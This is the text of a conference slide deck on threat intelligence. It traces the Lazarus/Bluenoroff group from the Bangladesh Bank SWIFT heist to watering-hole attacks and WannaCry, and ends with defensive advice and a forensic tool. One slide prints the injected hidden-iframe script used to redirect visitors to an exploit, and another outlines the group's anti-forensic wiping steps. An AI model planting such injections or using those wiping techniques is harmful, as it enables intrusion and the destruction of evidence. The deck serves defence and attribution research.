chasing the bad guys from bangladesh to costa rica · chasing the bad guys from bangladesh to costa...

SESSION ID:SESSION ID:

#RSAC

Vitaly Kamluk

Chasing the Bad Guys from Bangladesh to Costa Rica

FLE-R01

Director of APAC Research Centre,Kaspersky Lab@vkamluk

#RSAC

# whoami

Few words about the author

Presenter’s Company Logo – replace or

delete on master slide

#RSAC

# whoami

3

Eugene KasperskyVitaly Kamluk

12+ years at Kaspersky Lab2 years at INTERPOL

Focus:Malware AnalysisIncident ResponseDigital Forensics

Position:Head of security researchers in APAC region

#RSAC

Attacks Evolution

Quick overview and latest figures



#RSAC

1NEW VIRUS EVERY HOUR

1994

1NEW VIRUS EVERY MINUTE

2006

1NEW VIRUS EVERY SECOND

2011

323,000NEW SAMPLES EVERY DAY

2017

THE SCALE OF THE THREAT



#RSAC

0.1%

9.9%

90%Traditional cybercrime

Targeted threats to organisations

Cyber-weapons

Targeted attacks

APTs

THE NATURE OF THE THREAT



#RSAC

Exploitkits

Email

Social networks

USB

HOW MALWARE SPREADS



#RSAC

TARGETED ATTACK RESEARCHES

Darkhotel- part 2

MsnMMCampaigns

SatelliteTurla

WildNeutron

BlueTermite

SpringDragon

2011

2010

2013

Stuxnet

Duqu

2012

Gauss

Flame

miniFlame

NetTraveler

Miniduke

RedOctober

Icefog

Winnti

Kimsuky

TeamSpy

2014

Epic Turla

CosmicDuke

Regin

Careto / The Mask

Energetic Bear / Crouching Yeti

Darkhotel

2015

Desert Falcons

Hellsing

Sofacy

Carbanak

Equation

Naikon

AnimalFarm

Duqu 2.0

ProjectSauron

Saguaro

StrongPity

Ghoul

Fruity Armor

ScarCruft

2016

Poseidon

Lazarus

Lurk

GCMan

Danti

Adwind

Dropping Elephant

Metel

We discover and dissect the world’s most sophisticated threats

#RSAC

Bangladesh Hack

The story of one of the biggest cyberheists in history



#RSAC

THE FIRST ANNOUNCEMENTS

11



#RSAC

12

SCHEMATICS OF CYBER HEIST

US BANK Compromised BankCorr. Account

Offshore Bank

Attacker



#RSAC

13

SCHEMATICS OF CYBER HEIST

US BANK Compromised BankCorr. Account

Offshore Bank Attacker



#RSAC

14

Watershed event for SWIFT and the global financial industry

High level of sophistication / knowledge – hiding of business/application evidence

• Deletion of fraudulent payment instructions from database

• Modification of SWIFT messages (end/start of day statements)

• Bypass of integrity verification checks

Customer Security Programme

BANGLADESH BANK INCIDENT



#RSAC

15

The SWIFT Network and connections to the SWIFT network have not been compromised

SWIFT does not rely on the customer’s security to secure the SWIFT Network

Each customer is responsible and accountable for protecting its local environment and access to SWIFT

NOTES FROM SWIFT

#RSAC

LAZARUS!

What is this Lazarus actor?



#RSAC

SONY PICTURES INCIDENT (2014)

17



#RSAC

18

Credits: Novetta

OPERATION BLOCKBUSTER (2016)



#RSAC

19

Courtesy of Novetta

PREVIOUS CAMPAIGNS

#RSAC

BUT WAS IT REALLY LAZARUS?

Let’s find that out



#RSAC

PREVIOUS RESEARCH

21

Vietnam Bangladesh

2016

Lazarus

Compromised webserver

20172015

Philippines

Wiper Wiper

Wiper

Text String

? ? ?

Poland



#RSAC

A BETTER PROOF

22

Vietnam Bangladesh

2016

Compromised webserver

20172015

South EastAsia

Patched filesConfig file formatOperation time

Poland, Mexico, and

others

Africa,Costa Rica

Overall designC2 ProtocolOwn PE-loaderImport resolution

Trace formatRC4 key

Lazarus

? ? ?

Philippines

Wiper Wiper

Wiper

Text String

Poland, Mexico, and

others



#RSAC

23

WORLDWIDE DETECTIONSBangladeshTaiwanVietnamThailandIraqMalaysiaIndonesiaIndiaPolandEthiopiaNigeriaGabonKenyaUruguayMexicoChileBrazilChileCosta Rica

Banks

Casinos

Investment Firms

CryptocurrencyBussinesses

source: KSN

#RSAC

INFECTION VECTOR

How do they get in?



#RSAC

WATERING HOLE ATTACKS

25

Polish website Mexican website



#RSAC

MALICIOUS CODE INJECTION

26

document.write("<div width='0px' height='0px'><iframewidth='145px'height='146px'style='left:-2144px; position:absolute; top:0px;'src='https://[PATH]/view.jsp?pagenum=1'..>

</iframe></div>");



#RSAC

SITE REDIRECTION

27

iframe

Governmentwebsite

Visitors

JScript Exploit

Other compromisedwebsite

TargetList



#RSAC

MAP OF TARGETS

28

#RSAC

OTHER TARGETS

Who else do they hit?



#RSAC

More illegal profit

30

Mining cryptocurrency on other compromised hosts

Two crypto-currency businesses compromised

63+ ATMs were infected in South Korea

Two Korean local ATM vendors breached

EMV credit card writer software backdooredDistributed via hacking/carder forums

#RSAC

TACTICS

Some of interesting techniques



#RSAC

32

ANTI-FORENSIC TECHNIQUES

• Wiping files securely:• overwrite file with random pattern;• rename file to a random name;• delete the file using system API;• repeatedly create and delete new files

• Wiping registry values securely:• overwrite value with random pattern;• delete the registry value;• apply the same to all keys recursively.

• Self-cleanup:• wipe temp files, configs, components

• Wiping prefetch files.• Wiping event log files.

• initiate event log backup • the system releases the file lock;

• wipe file securely.• DLL unloading and self-removal:

• use minimalistic 5Kb DLL to do initiate external unloading and memory cleaning.



#RSAC

ANTI-FORENSIC TECHNIQUES

Password Protection 20-31 alpha-numeric charactersDiscovered passwords:

Isolated subnetfor SWIFT

InternalIT system

LoaderEncrypted Payload

KeyloggerComponent Isolation

1 2

3

#RSAC

WHO ARE THEY?

What else we know about them



#RSAC

BLUENOROFF: A LAZARUS UNIT

Cyber Espionage

Cyber Sabotage

Money Theft

Data Exfiltration

DoS

C2 Operation

Infiltration

Backdoors Development

Wiping Attacks

Cryptocurrency Mining

Lazarus

Bluenorroff



#RSAC

COMPARING THE CODE

36

No obfuscationStandard import resolutionNon-packed code*No network communicationSecure file-wipingEnglish languageExecution tracingRegular engineering operationNo visible false flagsNever used VirusTotal

Custom code obfuscatorObscured import resolution

Commercial packers (i.e. Enigma, Obsidium)Communication with C2 + Infrastructure support

Full scale of anti-forensicsKorean+English language

No execution tracingDisguise and stealthFalse flag operations

Uses VirusTotal

LAZARUS CODE BLUENOROFF CODE



#RSAC

37

LANGUAGE ARTEFACTS

Some Not Bad English

execute_nroff(%s) - success with exit_code=%08Xcopying to %s failed with error=%d[FOXIT_READER] : Successfully copied to %sPDFModulation failed, so logclear will be executed.Executing real foxit reader with CommandLine = %s.[LOG_CLEAR] : failed to delete source file.Receiver :Sender :DO_NOT_USE_MMexecute_nroff(%s) - success with exit_code=%08Xexecute_nroff(%s) - failed with error=%dcopy failed [%s]-[%s] with error = %dcopy success [%s]-[%s]backup_file(%s, %s, %d)=%dPatchMemory(%s, %d)[WorkMemory] pid=%d, name=%s

Korean Locale



#RSAC

FALSE FLAGS

3. Backdoor Commands

kliyent2pondklyuchit ssylka ustanavlivat poluchit

pereslat derzhat vykhodit Nachalo

1. Exploit code

chainik babaLEna geigeigei3raza daiadreschainika

2. Enigma Protector



#RSAC

39

THE BIGGEST OPSEC FAILURE

From the server logs of a C2 in Europe:

2017-01-18 02:54: Apache Tomcat started on port 80802017-01-18 04:10: HTTP GET view.jsp (via VPN in France)2017-01-18 04:10: Testing bot (via VPN in France)...2017-01-18 08:12: Testing bot (via VPN in Korea)...2017-01-18 11:12: Testing bot (from IP in North Korea)

175.45.***.***inetnum: 175.45.176.0 - 175.45.179.255netname: STAR-KPdescr: Ryugyong-dongdescr: Potong-gang Districtrole: STAR JOINT VENTURE CO LTDaddress: Ryugyong-dong Potong-gang Districtcountry: KP



#RSAC

RECENT CONFIRMATION

Source: Group-IB



#RSAC

41

ATTRIBUTION CONCLUSIONS

1. Someone invested huge amount of money to frame NK*. *less likely.

2. A third force could be involved to help NK from the outside.

3. If this is truly North Korea, it means we know very little about their current motivation and use of cyber offense.

#RSAC

THE LAST DROP

One more thing…



#RSAC

43

WANNACRY



#RSAC



#RSAC

45



#RSAC

ATTRIBUTION



#RSAC

Visible Code Flow Similarity



#RSAC



#RSAC

OBSOLETE LIBRARY



#RSAC

WannaCry socket setup



#RSAC

Lazarus socket setup



#RSAC

API address resolution (dynamic import)

DYNAMIC IMPORTS



#RSAC

CONCLUSIONS

• LAZARUS is one of the most aggressive and persistent APT groups.• They have support of dozens (or hundreds?) of people.• Their unusual financial motivation makes them different from other actors.• Public exposure doesn’t stop them for long.• They seem to switch to hacking and recruiting other hackers.• They have no obligations, no code of conduct, no moral principles.



#RSAC

RECOMMENDATIONS

Common best practice against APT attacks:• Make sure you update your software. TEST IT!• Segregate your networks• Record your netflow (or whole traffic if you can)• Use endpoint security solutions, firewalls, etc, but DO MONITOR ALERTS.

• In case of ANY minor infection – get to the ROOT CAUSE of it.



#RSAC

ADVANCED RECOMMENDATIONS

Advanced techniques against APT attacks:• Enable extensive logging (hint: deploy sysmon)• Use honeypots and home-built deception• Use custom set of yara rules (hint: create own yara rules)

• Scan network traffic• Scan and identify reliably all new malware/adware/etc

• Hint: sometimes “adware” is not what it seems• Hint: if you cannot identify the file:

• Ask VirusTotal• Search online• Ask security researchers

#RSAC

HOW TO CHANGE GLOBAL SECURITY LANDSCAPE?What we do and what you could do too.



#RSAC

Expert Police

CONNECTING PRIVATE SECTOR TO POLICE



#RSAC

270Mb 350Mb 750Mb

Minimal

Optimal

Maximal

size

features

BITSCOUT FLAVORS



#RSAC

Remote Location

Expert

Step 1.

Step 2.Step 3.

Trusted ServerTerminal Access

OwnerPolice

REMOTE ASSISTANCE IN A NUTSHELL



#RSAC

Expert

A remote system

Virtual HDD

Virtual host

Physical host

Real HDD

Root shell

Owner

Police

SOLVING THE PROBLEM OF TRUST



#RSAC

• Minimal and robust• Runs on any old and new hardware• Records remote user sessions• Device access authorized by the owner• Provides multi-user sessions• Perfect for education

• Lets you build YOUR OWN OS!• FREE for all and OPEN-SOURCE! github.com/vitaly-kamluk

Download Bitscout here:

BITSCOUT FEATURES

#RSAC

THANK YOU!

Vitaly Kamluk, Kaspersky Lab

@vkamlukgithub.com/vitaly-kamluk

chasing the bad guys from bangladesh to costa rica · chasing the bad guys from bangladesh to costa...

Documents